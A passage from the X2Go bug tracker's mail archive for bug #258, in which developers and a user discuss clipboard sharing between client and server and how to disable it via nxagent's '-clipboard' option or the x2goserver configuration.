vBTi86QfHjL8JxUFz90urj6CYXvwIRAY9kTqUzn53NCaIODGu+C7Wk/EmcgHvbW9otsuYg1CNEG8 /4uK9VEiqogwAOKw1Ly+ZbrVA1d5m+jcyE34UO2RpVIooqz7Nlg+6ZQrkVCHG9Ze1ozM9w8QDFJO 0BZh5eUKbL8Xx3JGV5yY9WxgY3pvXrlOL8i5ubtqhbyYDe35PpeENJSuAK+h5eeSbk698+LZFItc 0usBbKAXpS0Q65x6Sr297s797SJAq3A4iPUKh2rCqwVgyUgF2lPB3kR3arPzPDztgLymOEopJF/+ WTubJXpWYwBkuV2kYn1XNk+tg+8fklOgjndX3eVhET0jAJBMPPqjYJMEo6819g5qj09KYKeFBWxG oY/0x3bjoVlX93GyxG4UXG1tQWbfG5Ox1ADD7svPPD0hgKlfY2X83eBfpPQr8IVxQdRnJfsasZeu 1pmCE0HSbqUbmSeA5wupqAAxggLtMIIC6QIBATBbMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4w HAYDVQQLExVodHRwOi8vd3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJv b3QCAwEBgjANBglghkgBZQMEAgMFAKCCAWMwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkq hkiG9w0BCQUxDxcNMTMwNzAyMTc1ODA2WjBPBgkqhkiG9w0BCQQxQgRAh+ZOi4RaDcU1k7Upmwir c/5L9T8gqztz38jS8XVG92xzsuXh+bR5wvJ5y9fx51xGIZWjX20MP5uoutkSqSb5FjBqBgkrBgEE AYI3EAQxXTBbMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8vd3d3LkNB Y2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QCAwEBgjBsBgsqhkiG9w0BCRAC CzFdoFswVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0FjZXJ0 Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdAIDAQGCMA0GCSqGSIb3DQEBAQUABIIB AB1c8MLP+0HkyCPwhgMR2h1l1/wDIqHhKhf4A+3emL0UC/Mt8eeHemCVJlJ/AE6873SfF9nAbUbp b1wLEVeJCkdJ/KpJ/TcHWvdR7XvzU0W9hQW+wkRXGXkOgRYs5vQBTem6XdvEU2OzsR9LJbfU0BB7 hgncH4CuB57cDxoiKpkL7zDtrK9TJfv8yieaZWHYLFms3T3/ruW5dQF2nzaYA7biVl4/AMzRRAa0 jU7sHRZ1jIWT4UkoOlXDS0ogJKVO9ELtQ2xV9t0du5gFgGhUt7ylgYzEFk124BH6PhPct02c5jMR GBmiY71nxHQHs+wD13x7f6+9e2XLO/El/apII9wAAAAAAAA= --=-zytB+CyUK584+ZxoPFn9-- From Moritz.Struebe@informatik.uni-erlangen.de Wed Jul 3 10:20:33 2013 Received: (at 258) by bugs.x2go.org; 3 Jul 2013 08:20:34 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED, T_FILL_THIS_FORM_SHORT,URIBL_BLOCKED autolearn=ham version=3.3.2 X-Greylist: delayed 399 seconds by postgrey-1.34 at ymir; Wed, 03 Jul 2013 10:20:33 CEST Received: from faui40.informatik.uni-erlangen.de (faui40.informatik.uni-erlangen.de [131.188.34.40]) by ymir (Postfix) with ESMTPS id C54FE5DB13 for <258@bugs.x2go.org>; Wed, 3 Jul 2013 10:20:33 +0200 (CEST) Received: from [IPv6:2001:638:a000:4134::ffff:51] (faui48e.informatik.uni-erlangen.de [IPv6:2001:638:a000:4134::ffff:51]) by faui40.informatik.uni-erlangen.de (Postfix) with ESMTP id A8DA358C6E6; Wed, 3 Jul 2013 10:13:53 +0200 (CEST) Message-ID: <51D3DD41.70605@informatik.uni-erlangen.de> Date: Wed, 03 Jul 2013 10:13:53 +0200 From: Moritz Struebe Organization: Uni Erlangen-Nuernberg User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20130620 Thunderbird/17.0.7 MIME-Version: 1.0 To: Christoph Anton Mitterer , 258@bugs.x2go.org, x2go-dev@lists.berlios.de Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> <1372728469.11367.26.camel@fermat.scientia.net> <20130702180752.6b3c8c97@warp> <1372787237.7849.101.camel@heisenberg.scientia.net> In-Reply-To: <1372787237.7849.101.camel@heisenberg.scientia.net> X-Enigmail-Version: 1.5.1 Content-Type: multipart/signed; protocol="application/pkcs7-signature"; micalg=sha1; boundary="------------ms070501030000090102000703" Dies ist eine kryptografisch unterzeichnete Nachricht im MIME-Format. --------------ms070501030000090102000703 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Hey. On 2013-07-02 19:47, Christoph Anton Mitterer wrote: > I'd propose the following now: > As this bug is now cluttered all over with two different issues > - clipboard sniffing and the warning when it was activated > - security measures and better documentation about what NX/X2go really > does > > I'd close this bug, and open two new ones, one for each issue... > referencing that old bug... so that all topics can be discussed (perhap= s > fixed) in a more simple fashion. I think this is a good Idea. I just want to warn you that this issue will not have an very high priority, as most/all core devs work in scenarios where host _and_ client are trusted. None the less contributions to the documentation are very welcome, and can be easily contributed without coding skills. ;) - If you need pointers on getting started feel free to ask. Morty --=20 Dipl.-Ing. Moritz 'Morty' Struebe (Wissenschaftlicher Mitarbeiter) Lehrstuhl f=FCr Informatik 4 (Verteilte Systeme und Betriebssysteme) Friedrich-Alexander-Universit=E4t Erlangen-N=FCrnberg Martensstr. 1 91058 Erlangen Tel : +49 9131 85-25419 Fax : +49 9131 85-28732 eMail : struebe@informatik.uni-erlangen.de WWW : http://www4.informatik.uni-erlangen.de/~morty --------------ms070501030000090102000703 Content-Type: application/pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Kryptografische Unterschrift MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIPITCC BCEwggMJoAMCAQICAgDHMA0GCSqGSIb3DQEBBQUAMHExCzAJBgNVBAYTAkRFMRwwGgYDVQQK ExNEZXV0c2NoZSBUZWxla29tIEFHMR8wHQYDVQQLExZULVRlbGVTZWMgVHJ1c3QgQ2VudGVy MSMwIQYDVQQDExpEZXV0c2NoZSBUZWxla29tIFJvb3QgQ0EgMjAeFw0wNjEyMTkxMDI5MDBa Fw0xOTA2MzAyMzU5MDBaMFoxCzAJBgNVBAYTAkRFMRMwEQYDVQQKEwpERk4tVmVyZWluMRAw DgYDVQQLEwdERk4tUEtJMSQwIgYDVQQDExtERk4tVmVyZWluIFBDQSBHbG9iYWwgLSBHMDEw ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDpm8NnhfkNrvWNVMOWUDU9YuluTO2U 1wBblSJ01CDrNI/W7MAxBAuZgeKmFNJSoCgjhIt0iQReW+DieMF4yxbLKDU5ey2QRdDtoAB6 fL9KDhsAw4bpXCsxEXsM84IkQ4wcOItqaACa7txPeKvSxhObdq3u3ibo7wGvdA/BCaL2a869 080UME/15eOkyGKbghoDJzANAmVgTe3RCSMqljVYJ9N2xnG2kB3E7f81hn1vM7PbD8URwoqD oZRdQWvY0hD1TP3KUazZve+Sg7va64sWVlZDz+HVEz2mHycwzUlU28kTNJpxdcVs6qcLmPkh nSevPqM5OUhqjK3JmfvDEvK9AgMBAAGjgdkwgdYwcAYDVR0fBGkwZzBloGOgYYZfaHR0cDov L3BraS50ZWxlc2VjLmRlL2NnaS1iaW4vc2VydmljZS9hZl9Eb3dubG9hZEFSTC5jcmw/LWNy bF9mb3JtYXQ9WF81MDkmLWlzc3Vlcj1EVF9ST09UX0NBXzIwHQYDVR0OBBYEFEm3xs/oPR9/ 6kR7Eyn38QpwPt5kMB8GA1UdIwQYMBaAFDHDeRu69VPXF+CJei0XbAqzK50zMA4GA1UdDwEB /wQEAwIBBjASBgNVHRMBAf8ECDAGAQH/AgECMA0GCSqGSIb3DQEBBQUAA4IBAQA74Vp3wEgX 3KkY7IGvWonwvSiSpspZGBJw7Cjy565/lizn8l0ZMfYTK3S9vYCyufdnyTmieTvhERHua3iR M347XyYndVNljjNj7s9zw7CSI0khUHUjoR8Y4pSFPT8z6XcgjaK95qGFKUD2P3MyWA0Ja6ba hWzAP7uNZmRWJE6uDT8yNQFb6YyC2XJZT7GGhfF0hVblw/hc843uR7NTBXDn5U2KaYMo4RMJ hp5eyOpYHgwf+aTUWgRo/Sg+iwK2WLX2oSw3VwBnqyNojWOl75lrXP1LVvarQIc01BGSbOyH xQoLBzNytG8MHVQs2FHHzL8w00Ny8TK/jM5JY6gA9/IcMIIFNzCCBB+gAwIBAgIECr6fXjAN BgkqhkiG9w0BAQUFADBaMQswCQYDVQQGEwJERTETMBEGA1UEChMKREZOLVZlcmVpbjEQMA4G A1UECxMHREZOLVBLSTEkMCIGA1UEAxMbREZOLVZlcmVpbiBQQ0EgR2xvYmFsIC0gRzAxMB4X DTA3MDcxOTA4MzMxOVoXDTE5MDYzMDAwMDAwMFowgaMxCzAJBgNVBAYTAkRFMQ8wDQYDVQQI EwZCYXllcm4xETAPBgNVBAcTCEVybGFuZ2VuMSgwJgYDVQQKEx9Vbml2ZXJzaXRhZXQgRXJs YW5nZW4tTnVlcm5iZXJnMQ0wCwYDVQQLEwRSUlpFMQ8wDQYDVQQDEwZGQVUtQ0ExJjAkBgkq hkiG9w0BCQEWF2NhQHJyemUudW5pLWVybGFuZ2VuLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOC AQ8AMIIBCgKCAQEAt4zo7dRsCRRgHOL7iMEQXwWSXMbFa8Acei7z6I0pxFUxT18yK4n+fgq4 f/cCDMaWjKJ4KWY6p78qUiFZRG0zCw6YPesxyVen2KUbt4hTvS4TzZrPULDs3ZXej22Ug+UM frVlcrxcJA7Tm7/O5uotER46J1xX6KuW6vnjyG7L6JREwa6jAaAfW2b2XVffvfleqS+QXCdT NSSEWIAHC1qPEhnTbaAwIltrlFeP4tJm/7rsw9OpCZ2gx/dZKzzOkzznj5FJI81uKcoOjgoB GR9o2ROJvfoc8x8xO7lWIFHlMi5En+AAe1XdgL5RxyOmP/LhdQ34Siqyo4OUWxW/33goCQID AQABo4IBuTCCAbUwEgYDVR0TAQH/BAgwBgEB/wIBATALBgNVHQ8EBAMCAQYwHQYDVR0OBBYE FPRz8/rGQrPGXGnAWL50OPlhK45iMB8GA1UdIwQYMBaAFEm3xs/oPR9/6kR7Eyn38QpwPt5k MCIGA1UdEQQbMBmBF2NhQHJyemUudW5pLWVybGFuZ2VuLmRlMIGIBgNVHR8EgYAwfjA9oDug OYY3aHR0cDovL2NkcDEucGNhLmRmbi5kZS9nbG9iYWwtcm9vdC1jYS9wdWIvY3JsL2NhY3Js LmNybDA9oDugOYY3aHR0cDovL2NkcDIucGNhLmRmbi5kZS9nbG9iYWwtcm9vdC1jYS9wdWIv Y3JsL2NhY3JsLmNybDCBogYIKwYBBQUHAQEEgZUwgZIwRwYIKwYBBQUHMAKGO2h0dHA6Ly9j ZHAxLnBjYS5kZm4uZGUvZ2xvYmFsLXJvb3QtY2EvcHViL2NhY2VydC9jYWNlcnQuY3J0MEcG CCsGAQUFBzAChjtodHRwOi8vY2RwMi5wY2EuZGZuLmRlL2dsb2JhbC1yb290LWNhL3B1Yi9j YWNlcnQvY2FjZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAQEARMHGwyEK31G2lGZ8MeYwocnQ MBLi0JIQdP5XtbPJ7cd3IoKhl0XU1+ZpCzN35kgrwmpjHpar73uSrmjcZEjZKxGzis70osCX wCmDGrzk4oLggiRxkXjpMZoGBAeIUwOppw9P73Gm13yjbDjjHlCwOxSMq4nmc8kw6eMvK5my nO+0as8Iq6BndmKM8CfMQdaR4DFMWnF/c5FTQQxfcp14PIhvPkEY8KXIwHXSyhpTbQaUnkAP LKagH+e8HPRti6uHDZfqQkwyZoKApwg4Klq851LKSvNNQGUSkUOnlYg+NcaLpjiRBZ2n+GTS Y02WFwXTAH66k/Nclhmq9IeWkW3iZjCCBb0wggSloAMCAQICBxL4KPF3HOUwDQYJKoZIhvcN AQEFBQAwgaMxCzAJBgNVBAYTAkRFMQ8wDQYDVQQIEwZCYXllcm4xETAPBgNVBAcTCEVybGFu Z2VuMSgwJgYDVQQKEx9Vbml2ZXJzaXRhZXQgRXJsYW5nZW4tTnVlcm5iZXJnMQ0wCwYDVQQL EwRSUlpFMQ8wDQYDVQQDEwZGQVUtQ0ExJjAkBgkqhkiG9w0BCQEWF2NhQHJyemUudW5pLWVy bGFuZ2VuLmRlMB4XDTExMTIwMjEwNDEzOFoXDTE0MTIwMTEwNDEzOFowfDELMAkGA1UEBhMC REUxKDAmBgNVBAoTH1VuaXZlcnNpdGFldCBFcmxhbmdlbi1OdWVybmJlcmcxKjAoBgNVBAsT IURlcGFydG1lbnQgb2YgQ29tcHV0ZXIgU2NpZW5jZSA0IDEXMBUGA1UEAxMOTW9yaXR6IFN0 cnVlYmUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCfzPZGUhN/6df7oXojpNRT SyvDGmg/fhiOeAxQnN+DX9bLSMQtKs/xqrFhubYtEgcb94ontUuGrsGFxJERfJtuK1OeqyMB /Rne6GiSjH88Ut6nmykynS+2GeDsB6xgYn7CTIcZP6pC95zxK0qn+XSzaoMTiV1jcc3uxRLV UlvlAn4W8Z2rIvocTnLnIX6rk6nopjmfQQ1JeLOKOC8ztkZDhXvCg5vkZ38okkD9GEB118VE xZdulknZJCyrdNBBNsJgy9DnMqPzsQXjmZQP0aTMx0wWVfy5xxrT4qM+FKDIBY6RG4n+pfnO Af35Yc8aL6+XtYyKH67Y+gfk1vnEGa+/AgMBAAGjggIaMIICFjAJBgNVHRMEAjAAMAsGA1Ud DwQEAwIF4DApBgNVHSUEIjAgBggrBgEFBQcDAgYIKwYBBQUHAwQGCisGAQQBgjcUAgIwHQYD VR0OBBYEFMLK3xJsufrPkUH99qzwp1lh2GNLMB8GA1UdIwQYMBaAFPRz8/rGQrPGXGnAWL50 OPlhK45iMDQGA1UdEQQtMCuBKU1vcml0ei5TdHJ1ZWJlQGluZm9ybWF0aWsudW5pLWVybGFu Z2VuLmRlMIGfBgNVHR8EgZcwgZQwSKBGoESGQmh0dHA6Ly9jZHAxLnBjYS5kZm4uZGUvdW5p LWVybGFuZ2VuLW51ZXJuYmVyZy1jYS9wdWIvY3JsL2NhY3JsLmNybDBIoEagRIZCaHR0cDov L2NkcDIucGNhLmRmbi5kZS91bmktZXJsYW5nZW4tbnVlcm5iZXJnLWNhL3B1Yi9jcmwvY2Fj cmwuY3JsMIG4BggrBgEFBQcBAQSBqzCBqDBSBggrBgEFBQcwAoZGaHR0cDovL2NkcDEucGNh LmRmbi5kZS91bmktZXJsYW5nZW4tbnVlcm5iZXJnLWNhL3B1Yi9jYWNlcnQvY2FjZXJ0LmNy dDBSBggrBgEFBQcwAoZGaHR0cDovL2NkcDIucGNhLmRmbi5kZS91bmktZXJsYW5nZW4tbnVl cm5iZXJnLWNhL3B1Yi9jYWNlcnQvY2FjZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAQEAkhCt 8To6NRpOL/p31V5rKM8LWWyBrWW9ppyJaeFHeqmAiPPC+HMpO/364s14VTT637s2/zYMgbbl pU6AfY9c1uAmjK/PoF21R2r7PIebtCDU8ScFYaJ121L0MsvTPq8mPRUp0vm8pFMO6I4+FQnh YElXD5Avw/R7SO45cR82iZbI/jDDxaGehTZwflULM/6GZU6LcjbRI5OkEs/C5FksP67WwneO COD5RL8PB2Ta/ur9+m/9A6tvOACRLjXFjl080e6xSAs9bSJdrHQQ3d2PencaSCb5XVm1K/pO nTR6YicTk39CG6zbq/zdyzL1tK4oBg2BdTOgg0d8ZYlwGU084jGCBC4wggQqAgEBMIGvMIGj MQswCQYDVQQGEwJERTEPMA0GA1UECBMGQmF5ZXJuMREwDwYDVQQHEwhFcmxhbmdlbjEoMCYG A1UEChMfVW5pdmVyc2l0YWV0IEVybGFuZ2VuLU51ZXJuYmVyZzENMAsGA1UECxMEUlJaRTEP MA0GA1UEAxMGRkFVLUNBMSYwJAYJKoZIhvcNAQkBFhdjYUBycnplLnVuaS1lcmxhbmdlbi5k ZQIHEvgo8Xcc5TAJBgUrDgMCGgUAoIICUzAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwG CSqGSIb3DQEJBTEPFw0xMzA3MDMwODEzNTNaMCMGCSqGSIb3DQEJBDEWBBR+2wKDQQ3UqqZG 5MDLaCRytCdkrTBsBgkqhkiG9w0BCQ8xXzBdMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAQIw CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G CCqGSIb3DQMCAgEoMIHABgkrBgEEAYI3EAQxgbIwga8wgaMxCzAJBgNVBAYTAkRFMQ8wDQYD VQQIEwZCYXllcm4xETAPBgNVBAcTCEVybGFuZ2VuMSgwJgYDVQQKEx9Vbml2ZXJzaXRhZXQg RXJsYW5nZW4tTnVlcm5iZXJnMQ0wCwYDVQQLEwRSUlpFMQ8wDQYDVQQDEwZGQVUtQ0ExJjAk BgkqhkiG9w0BCQEWF2NhQHJyemUudW5pLWVybGFuZ2VuLmRlAgcS+CjxdxzlMIHCBgsqhkiG 9w0BCRACCzGBsqCBrzCBozELMAkGA1UEBhMCREUxDzANBgNVBAgTBkJheWVybjERMA8GA1UE BxMIRXJsYW5nZW4xKDAmBgNVBAoTH1VuaXZlcnNpdGFldCBFcmxhbmdlbi1OdWVybmJlcmcx DTALBgNVBAsTBFJSWkUxDzANBgNVBAMTBkZBVS1DQTEmMCQGCSqGSIb3DQEJARYXY2FAcnJ6 ZS51bmktZXJsYW5nZW4uZGUCBxL4KPF3HOUwDQYJKoZIhvcNAQEBBQAEggEALRWTotq8syyb b2lSSy1SRSwwLi8r8Fkf8tfEWD1Rt1sb/qvGpkrlnhaDR/Eiz6hwZ05fQBkNammP1DYVslwJ Q8nD5rOqGGjiuI4FGptpr/VyW/nmipYFVi4IKzmn9jGC8BQLn/mvZbHxcq//qI0xxQTFuFgM TJT+yB5GNsqwJoGMkIv6vyj3HEZA1P+LA2tYwXQ4wa4XU4f33p6S9C6RJVsxfBPXumFLcyqj 75dEfoNv81opo99BmIAVvivQIGTudsXJfnW3TLlgAjPLnvuTr+WlNH3+ymWkQBdmS0Mv/VFA 0eQb+6krmPCjMUvfP1TEvWo7YkH06OWMLMhxs+aYYQAAAAAAAA== --------------ms070501030000090102000703-- From mike.gabriel@das-netzwerkteam.de Tue Jan 28 16:49:11 2014 Received: (at 258) by bugs.x2go.org; 28 Jan 2014 15:49:12 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=ham version=3.3.2 Received: from freya.das-netzwerkteam.de (freya.das-netzwerkteam.de [88.198.48.199]) by ymir (Postfix) with ESMTPS id 87B575DB13 for <258@bugs.x2go.org>; Tue, 28 Jan 2014 16:49:11 +0100 (CET) Received: from grimnir.das-netzwerkteam.de (grimnir.das-netzwerkteam.de [78.46.204.98]) by freya.das-netzwerkteam.de (Postfix) with ESMTPS id F3494ADC; Tue, 28 Jan 2014 16:49:10 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTP id C9C433C737; Tue, 28 Jan 2014 16:49:10 +0100 (CET) X-Virus-Scanned: Debian amavisd-new at grimnir.das-netzwerkteam.de Received: from grimnir.das-netzwerkteam.de ([127.0.0.1]) by localhost (grimnir.das-netzwerkteam.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id ip4Pu142FKAz; Tue, 28 Jan 2014 16:49:10 +0100 (CET) Received: from grimnir.das-netzwerkteam.de (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTPSA id 9F6D03C324; Tue, 28 Jan 2014 16:49:10 +0100 (CET) Received: from 195.244.234.222 ([195.244.234.222]) by mail.das-netzwerkteam.de (Horde Framework) with HTTP; Tue, 28 Jan 2014 15:49:10 +0000 Date: Tue, 28 Jan 2014 15:49:10 +0000 Message-ID: <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> From: Mike Gabriel To: x2go-user@lists.berlios.de Cc: 258@bugs.x2go.org Subject: Re: [X2Go-User] Limiting clipboard sharing References: <52E69B93.8010904@sourcecap.ch> In-Reply-To: <52E69B93.8010904@sourcecap.ch> User-Agent: Internet Messaging Program (IMP) H5 (6.1.4) Accept-Language: en,de Organization: DAS-NETZWERKTEAM X-Originating-IP: 195.244.234.222 X-Remote-Browser: Mozilla/5.0 (X11; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 Iceweasel/26.0 Content-Type: multipart/signed; boundary="=_07l0yBSoJq8RBmtev9FzKA7"; protocol="application/pgp-signature"; micalg=pgp-sha1 MIME-Version: 1.0 This message is in MIME format and has been PGP signed. --=_07l0yBSoJq8RBmtev9FzKA7 Content-Type: text/plain; charset=utf-8; format=flowed; DelSp=Yes Content-Disposition: inline Hi Kris, On Mo 27 Jan 2014 18:46:59 CET, Kris Ilowiecki wrote: > Hello, > > I am quite new to X2Go, and really impressed by it. I'd like to > switch from opennx to X2Go, but I can't find a way to limit > clipboard sharing. > > Opennx, as well as other NX forks, has the options to enable clipboard > sharing both ways, one-way, or disable it completely. So far I have > failed to find a setting to limit this in X2Go. > > I'd need clipboard sharing to work only in the client->server > direction, or at least to disable it completely. > > I have searched for it for quite a while, but the best I have > managed to find is a bug report > http://bugs.x2go.org/cgi-bin/bugreport.cgi?bug=258 > and a mailing list question without a single reply. > > Is there some way to configure it? > If not, is it going to be hard to write a patch that would turn > this off at compilation time? > I've also been thinking of using some external programs to achieve > the effect, e.g. putting X2Go inside Xephyr, or the other way round... > > Any hints most welcome > > Many thanks, > Kris There should be two approaches... 1) disable clipboard server-side for all users 2) disable clipboard in X2Go Client / PyHoca-GUI on the client-side The first is easy. Please look at /usr/bin/x2gostartagent of x2goserver package and make clipboard configurable via /etc/x2go/x2goserver.conf. Send a patch to our BTS [1]. The second approach is for us devs, I guess... The workaround provided by Mike#2 is a fine approach, but not a real solution to this problem. Mike#1 [1] http://wiki.x2go.org/doku.php/wiki:bugs -- DAS-NETZWERKTEAM mike gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb --=_07l0yBSoJq8RBmtev9FzKA7 Content-Type: application/pgp-signature Content-Description: Digitale PGP-Signatur Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.15 (GNU/Linux) iQIcBAABAgAGBQJS59F2AAoJEJr0azAldxsxw9oP/3R/w1bF9DXO+u1/i8qcK4hb NaHvn9U1+5bjY/o2tNMz8Cv/FAvHxYWcyf6mNCSjKCMiGpU1U7KIHSfIZ4JtMrX7 v25u9om1zbyYfTuG0d76MwHi82FobGEY5a3YYXyA6nH03hPqBAmaSfYADuYqPKxL rPySsks9Bzvm2SfXkmLzA8YdVNV61CNdZiIpHzwpl4mGgmKGhcipHeuATbszqDlY x4oVFZGRFwbMjFAmY422iXETSSR5bIF8TYESJEJqGxEI5zV9ARljxhm2kXQqX1p3 Us/a82zR5AQ56DaHACvpwJEo0M5Mibhbgpr/KfCcK1sBVxIbhSnc0iS8aJ0cYEf1 zUzEUq+IpwrDLnAq7aSnCvm8q96F/2yZJ0i6Sw7Go2XQqrl6U7Y7DMXmzoFmFK+y /pHvLTV9tDiXr4EXzHROIq1scETBICI8WXPcZcuRls8z3Q0Yi5ELCL4bpL/OpD9N HBBBe8dzL3GaaSOh2eQpZcJ+6eKLaaZPmzuYlR1bxXR/N3RA7hOP9+t3dGCApOQM wDAAM1FSu/T6rDJhGa/FCJelmlHwUuhmEONqKKqi6D4vRMV+jjSS3l1pNTnFYJ// mx20Zs3g/wTp25mvfY6xxfq/OpimkU5uBjZXypg8GjGqjzC2yksljZtNnlX4tH33 C9q05IsuHC52z5jyAL8e =FuaI -----END PGP SIGNATURE----- --=_07l0yBSoJq8RBmtev9FzKA7-- From kril@sourcecap.ch Tue Jan 28 17:16:33 2014 Received: (at 258) by bugs.x2go.org; 28 Jan 2014 16:16:34 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=ham version=3.3.2 X-Greylist: delayed 324 seconds by postgrey-1.34 at ymir; Tue, 28 Jan 2014 17:16:33 CET Received: from mail.sourcecap.ch (mail.sourcecap.ch [91.201.56.210]) by ymir (Postfix) with ESMTP id AE0C65DB13 for <258@bugs.x2go.org>; Tue, 28 Jan 2014 17:16:33 +0100 (CET) Received: from [172.168.246.3] (kril.rem.sc.int [172.168.246.3]) by mail.sourcecap.ch (Postfix) with ESMTPSA id 61D13320AB; Tue, 28 Jan 2014 17:11:09 +0100 (CET) Message-ID: <52E7D6B8.6070208@sourcecap.ch> Date: Tue, 28 Jan 2014 17:11:36 +0100 From: Kris Ilowiecki User-Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20130215 Thunderbird/17.0.3 MIME-Version: 1.0 To: x2go-user@lists.berlios.de CC: 258@bugs.x2go.org Subject: Re: [X2Go-User] Limiting clipboard sharing References: <52E69B93.8010904@sourcecap.ch> <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> In-Reply-To: <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: clamav-milter 0.96 at pmx4 X-Virus-Status: Clean Hi Mike#1, On 01/28/2014 04:49 PM, Mike Gabriel wrote: > There should be two approaches... > > 1) disable clipboard server-side for all users > 2) disable clipboard in X2Go Client / PyHoca-GUI on the client-side > > The first is easy. Please look at /usr/bin/x2gostartagent of x2goserver > package and make clipboard configurable via /etc/x2go/x2goserver.conf. > Send a patch to our BTS [1]. > Thank you very much! The first approach is indeed what is needed in my case. I will have a look there. I have been looking through the sources, and my most recent idea was experimenting with editing /usr/bin/nxagent to run nxagent.bin with something like "-clipboard no" I will try the exact approach you are suggesting, though my bash+awk aren't that good Many thanks, Kris > The second approach is for us devs, I guess... > > The workaround provided by Mike#2 is a fine approach, but not a real > solution to this problem. > > Mike#1 > > [1] http://wiki.x2go.org/doku.php/wiki:bugs From krzysztof.ilowiecki@sourcecap.ch Tue Jan 28 19:11:33 2014 Received: (at 258) by bugs.x2go.org; 28 Jan 2014 18:11:34 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=ham version=3.3.2 X-Greylist: delayed 371 seconds by postgrey-1.34 at ymir; Tue, 28 Jan 2014 19:11:33 CET Received: from mail.sourcecap.ch (mail.sourcecap.ch [91.201.56.210]) by ymir (Postfix) with ESMTP id A44035DB13 for <258@bugs.x2go.org>; Tue, 28 Jan 2014 19:11:33 +0100 (CET) Received: from [172.168.246.3] (kril.rem.sc.int [172.168.246.3]) by mail.sourcecap.ch (Postfix) with ESMTPSA id A033E320AB; Tue, 28 Jan 2014 19:05:21 +0100 (CET) Message-ID: <52E7F17D.2010001@sourcecap.ch> Date: Tue, 28 Jan 2014 19:05:49 +0100 From: Krzysztof Ilowiecki User-Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20130215 Thunderbird/17.0.3 MIME-Version: 1.0 To: x2go-user@lists.berlios.de CC: 258@bugs.x2go.org Subject: Re: [X2Go-User] Limiting clipboard sharing References: <52E69B93.8010904@sourcecap.ch> <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> <52E7D6B8.6070208@sourcecap.ch> In-Reply-To: <52E7D6B8.6070208@sourcecap.ch> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: clamav-milter 0.96 at pmx4 X-Virus-Status: Clean On 01/28/2014 05:11 PM, Kris Ilowiecki wrote: > I have been looking through the sources, and my most recent idea was > experimenting with editing /usr/bin/nxagent to run nxagent.bin > with something like "-clipboard no" > > I will try the exact approach you are suggesting, though > my bash+awk aren't that good just a short update, the crude approach I had tried (hacking /usr/bin/nxagent) seems to be working. I just had made the mistake of typing "-clipboard no" instead of "-clipboard none" or "-clipboard client". I will have a closer look at editing the x2gostartagent to read x2goserver.conf, but I don't know if I'll succeed at this point. Many thanks, Kris From mike.gabriel@das-netzwerkteam.de Sun Jun 1 05:28:44 